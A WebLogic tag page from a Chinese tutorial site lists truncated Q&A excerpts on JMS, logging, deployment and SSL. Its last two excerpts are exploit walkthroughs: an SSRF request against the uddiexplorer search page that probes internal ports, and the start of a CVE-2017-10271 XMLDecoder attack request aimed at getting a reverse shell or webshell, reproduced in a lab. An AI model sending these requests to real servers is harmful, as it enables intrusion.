weblogic | 易学教程

What is Foreign JMS provider? What is the typical role of Weblogic in a JMS application?

阅读更多关于 What is Foreign JMS provider? What is the typical role of Weblogic in a JMS application?

问题 Currently I am working on a JMS application. But I use plain JMS API and Property file for configurations. My application is running in Weblogic and connects to MQ series server of my client. Recently I got to know I can use Weblogic for JMS configurations. Please explain. What is "Foreign JMS provider"? Is Weblogic also a JMS server or Foreign JMS provider or Both? 回答1: Weblogic provides the JMS Server features fully compliant with all JMS spec elements such as ConnectionFactory and

log4j and weblogic: duplicate log messages

阅读更多关于 log4j and weblogic: duplicate log messages

问题 I use log4j for logging in my project. Here is it's sample setup: public class MyClass { private final Logger logger = Logger.getLogger(MyClass.class); public MyClass() { BasicConfigurator.configure(); Logger.getLogger(MyClass.class).setLevel(Level.INFO); } ... } The problem is that on each next logger call it duplicates log messages (I mean on first call there is only 1 message, on second call there are 2 same messages, then there are 3 of them and so on). It seems that each time new logger

Weblogic upgrade to 12c: deployment fails because url mapped to multiple servlet

阅读更多关于 Weblogic upgrade to 12c: deployment fails because url mapped to multiple servlet

问题 I've recently setup a new Weblogic 12c environment. On deploying an application that I know works in Weblogic 11g I get the error "The url-pattern /resources/* in web application is mapped to multiple Servlets." The mapping it's referring to is in the web.xml inside the application.ear that's being deployed, but it's only mapped once: <servlet-mapping> <servlet-name>velocity</servlet-name> <url-pattern>/resources/*</url-pattern> </servlet-mapping> The project doesn't contain any other

Will Oracle retire 10gAS in favor of WebLogic?

阅读更多关于 Will Oracle retire 10gAS in favor of WebLogic?

问题 Oracle purchased BEA and their WebLogic suite of tools. They still have a competing product in their own 10gAS Application Server. Both are Java EE, enterprise grade, servers. While it make take some time due to maintenance agreements, it would be unusual for them to continue to produce two products within the same architectural space. So... Will they retire their previous application server in favor of WebLogic? Is WebLogic the one that will be retired? How long of a process is this likely

Weblogic用其他用户无法启动

阅读更多关于 Weblogic用其他用户无法启动

下班路上接到同事求救电话，说误用root用户启动weblogic后，用其他用户无法启动weblogic了，weblogic抛出如下异常： java.lang.ClassCastException: com.octetstring.vde.backend.BackendRoot at weblogic.ldap.EmbeddedLDAP.start(EmbeddedLDAP.java:273) at weblogic.t3.srvr.SubsystemRequest.run(SubsystemRequest.java:64) at weblogic.work.ExecuteThread.execute(ExecuteThread.java:209) at weblogic.work.ExecuteThread.run(ExecuteThread.java:181) > <2010-8-9 下午06时36分55秒 CST> <Notice> <WebLogicServer> <BEA-000365> <Server state changed to FAILED> <2010-8-9 下午06时36分55秒 CST> <Error> <WebLogicServer> <BEA-000383> <A critical service failed. The server will

Starting weblogic server in background in Linux

阅读更多关于 Starting weblogic server in background in Linux

问题 I have installed Weblogic Server 10.3.6, and I use the below script to start my server: user_projects/domains/my_domain/bin/startWebLogic.sh I found below command to start the server in background: nohup startWebLogic.sh & But when I use this command I am getting this output: -bash-3.2$ nohup ./startWebLogic.sh & [2] 25379 -bash-3.2$ nohup: appending output to `nohup.out' So here I have to press Enter to come out of this and go to new line. Now my requirement is that when I run the command

How do I call a remote EJB in an EAR from another?

阅读更多关于 How do I call a remote EJB in an EAR from another?

问题 In Weblogic 10.3, how do I inject a remote EJB from one EAR into a Stateless bean of another, both EARs being deployed in the same container? Ideally I'd like to do as much as possible with annotations. So suppose I have the following interface: public interface HelloService { public String hello(); } implemented by the following EJB: @Stateless @Remote public class HelloServiceBean implements HelloService { public String hello() { return "hello"; } } Suppose they're packaged and deployed in

Is there a way to recover the common name of a client certificate from java code in a 2 way ssl connection?

阅读更多关于 Is there a way to recover the common name of a client certificate from java code in a 2 way ssl connection?

We have a weblogic server configured to require a client certificate on stablishing a ssl connection with client for a web service solution. The ssl handshake works perfectly as we have already configured all that is required. Now, after the connection we do receive a soap request where the client id is one of the fields of this request soap. What we need to do is to check this id against the common name of the client certificate used to connect within our server in order to garantee the transaction. This is very important to us because this is a bank transaction and there is a lot of money

Weblogic SSRF漏洞利用

阅读更多关于 Weblogic SSRF漏洞利用

漏洞产生原因：是指Web服务提供从用户指定的URL读取数据并展示功能又未对用户输入的URL进行过滤，导致攻击者可借助服务端实现访问其本无权访问的URL。攻击者无权访问的URL主要是内网，而对于不是Web服务的其他端口反回的一般是端口对应的服务的banner信息，所以SSRF的一大利用是探测内网端口开放信息。（所以SSRF归类为信息泄漏类型）漏洞利用： 1.1、直接访问： http://ip:7001/uddiexplorer/ ,SSRF漏洞存在于： http://ip:7001/uddiexplorer/SearchPublicRegistries.jsp 1.2、向服务器提交以下参数： ?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001 1.3、当我们访问一个存在的端口时，比如： http://ip:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business

Weblogic XMLDecoder反序列化漏洞(CVE-2017-10271）

阅读更多关于 Weblogic XMLDecoder反序列化漏洞(CVE-2017-10271）

Weblogic XMLDecoder反序列化漏洞(CVE-2017-10271）漏洞概述: -该漏洞产生于WLS-WebServices这个核心组件中，因为它使用XMLDecoder来解析XML数据，直接构造payload，发送xml数据，即可利用该漏洞，上传webshell等等。漏洞版本： 10.3.6.0.0，12.2.1.1.0，12.2.1.2.0，12.1.3.0.0 漏洞搭建： https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2017-10271 漏洞复现：首先进行初步判断，看是否存在该页面，wls-wsat/CoordinatorPortType payload(发送数据xml时，反弹shell语句，要进行编码。) POST /wls-wsat/CoordinatorPortType HTTP/1.1 Host: 172.17.0.1:7001 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/hAccept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla